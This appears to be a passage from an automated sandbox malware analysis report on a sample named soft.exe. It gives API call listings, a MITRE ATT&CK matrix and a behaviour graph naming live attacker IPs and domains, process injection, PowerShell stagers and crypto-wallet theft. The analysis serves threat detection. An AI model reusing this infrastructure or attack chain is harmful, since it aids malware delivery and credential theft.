sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,13_2_6096748C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,13_2_609254B1
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,13_2_6094B407
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6090F435 sqlite3_bind_parameter_index,13_2_6090F435
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,13_2_609255D4
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609255FF sqlite3_bind_text,13_2_609255FF
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,LdrInitializeThunk,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,13_2_6096A5EE
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,13_2_6094B54C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,13_2_60925686
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,13_2_6094A6C5
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,13_2_609256E5
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,13_2_6094B6ED
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6092562A sqlite3_bind_blob,13_2_6092562A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,13_2_60925655
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,13_2_6094C64A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,13_2_609687A7
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,13_2_6095F7F7
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,13_2_6092570B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,13_2_6095F772
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,13_2_60925778
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6090577D sqlite3_bind_parameter_name,13_2_6090577D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,13_2_6094B764
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6090576B sqlite3_bind_parameter_count,13_2_6090576B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,13_2_6094A894
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,13_2_6095F883
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,13_2_6094C8C2
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,13_2_6096281E
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,13_2_6096583A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,13_2_6095F9AD
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,13_2_6094A92B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6090EAE5 sqlite3_transfer_bindings,13_2_6090EAE5
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,13_2_6095FB98
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,13_2_6095ECA6
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,13_2_6095FCCE
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,13_2_6095FDAE
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,13_2_60966DF1
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,13_2_60969D75
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,13_2_6095FFB2

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information111
                            Scripting                            		Valid Accounts12
                            Windows Management Instrumentation                            		111
                            Scripting                            		1
                            Exploitation for Privilege Escalation                            		1
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		14
                            Ingress Tool Transfer                            		Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomainsDefault Accounts4
                            Native API                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            Account Discovery                            		Remote Desktop Protocol31
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Exploitation for Client Execution                            		15
                            Windows Service                            		1
                            Access Token Manipulation                            		4
                            Obfuscated Files or Information                            		Security Account Manager12
                            File and Directory Discovery                            		SMB/Windows Admin Shares2
                            Clipboard Data                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts22
                            Command and Scripting Interpreter                            		1
                            Registry Run Keys / Startup Folder                            		15
                            Windows Service                            		31
                            Software Packing                            		NTDS57
                            System Information Discovery                            		Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts2
                            Service Execution                            		1
                            Bootkit                            		312
                            Process Injection                            		1
                            Timestomp                            		LSA Secrets481
                            Security Software Discovery                            		SSHKeylogging125
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable Media2
                            PowerShell                            		RC Scripts1
                            Registry Run Keys / Startup Folder                            		1
                            DLL Side-Loading                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading                            		DCSync351
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                            Virtualization/Sandbox Evasion                            		Proc Filesystem11
                            Application Window Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation                            		/etc/passwd and /etc/shadow3
                            System Owner/User Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                            Process Injection                            		Network Sniffing1
                            System Network Configuration Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                            Bootkit                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1626993 Sample: soft.exe Startdate: 01/03/2025 Architecture: WINDOWS Score: 100 86 45.91.200.135 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 2->86 88 starrynsightsky.icu 2->88 90 8 other IPs or domains 2->90 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Malicious sample detected (through community Yara rule) 2->114 116 23 other signatures 2->116 13 soft.exe 2->13         started        16 svchost.exe 2->16         started        18 svchost.exe 2->18         started        21 5 other processes 2->21 signatures3 process4 dnsIp5 130 Writes to foreign memory regions 13->130 132 Allocates memory in foreign processes 13->132 134 Injects a PE file into a foreign processes 13->134 23 BitLockerToGo.exe 22 13->23         started        136 Changes security center settings (notifications, updates, antivirus, firewall) 16->136 27 MpCmdRun.exe 16->27         started        92 twc.trafficmanager.net 104.40.149.189, 123 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->92 signatures6 process7 dnsIp8 100 185.156.73.73, 49940, 80 RELDAS-NETRU Russian Federation 23->100 72 C:\Users\user\AppData\...\MnzBi21FK.exe, PE32+ 23->72 dropped 74 C:\Users\user\AppData\...747LnRW81Rfq.exe, PE32 23->74 dropped 76 C:\Users\user\AppData\Local\...\UNIQ[1].file, PE32+ 23->76 dropped 78 C:\Users\user\AppData\...\UNIQTWO[1].file, PE32 23->78 dropped 29 N7LnRW81Rfq.exe 2 23->29         started        32 MnzBi21FK.exe 1 3 23->32         started        35 conhost.exe 27->35         started        file9 process10 file11 84 C:\Users\user\AppData\...847LnRW81Rfq.tmp, PE32 29->84 dropped 37 N7LnRW81Rfq.tmp 18 26 29->37         started        108 Multi AV Scanner detection for dropped file 32->108 40 cmd.exe 3 2 32->40         started        signatures12 process13 file14 64 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 37->64 dropped 66 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 37->66 dropped 68 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 37->68 dropped 70 21 other malicious files 37->70 dropped 42 ssdtoolbox.exe 1 19 37->42         started        46 wscript.exe 1 40->46         started        49 conhost.exe 40->49         started        process15 dnsIp16 102 176.113.115.96, 443, 49984, 49986 SELECTELRU Russian Federation 42->102 104 195.154.243.38, 2024, 49985, 49988 OnlineSASFR France 42->104 80 C:\ProgramData\SSDToolBox\sqlite3.dll, PE32 42->80 dropped 82 C:\ProgramData\SSDToolBox\SSDToolBox.exe, PE32 42->82 dropped 146 Suspicious powershell command line found 46->146 148 Wscript starts Powershell (via cmd or directly) 46->148 150 Windows Scripting host queries suspicious COM object (likely to drop second stage) 46->150 152 Suspicious execution chain found 46->152 51 powershell.exe 7 46->51         started        file17 signatures18 process19 signatures20 118 Suspicious powershell command line found 51->118 120 Found many strings related to Crypto-Wallets (likely being stolen) 51->120 122 Found suspicious powershell code related to unpacking or dynamic code loading 51->122 54 powershell.exe 14 23 51->54         started        58 conhost.exe 51->58         started        process21 dnsIp22 94 ofice365.github.io 185.199.108.153, 443, 49974 FASTLYUS Netherlands 54->94 96 62.60.226.112, 49975, 80 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 54->96 98 bitbucket.org 185.166.143.48, 443, 49973 AMAZON-02US Germany 54->98 124 Writes to foreign memory regions 54->124 126 Injects a PE file into a foreign processes 54->126 128 Loading BitLocker PowerShell Module 54->128 60 MSBuild.exe 54->60         started        signatures23 process24 dnsIp25 106 hardswarehub.today 104.21.64.1, 443, 49976, 49977 CLOUDFLARENETUS United States 60->106 138 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 60->138 140 Query firmware table information (likely to detect VMs) 60->140 142 Found many strings related to Crypto-Wallets (likely being stolen) 60->142 144 2 other signatures 60->144 signatures26

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.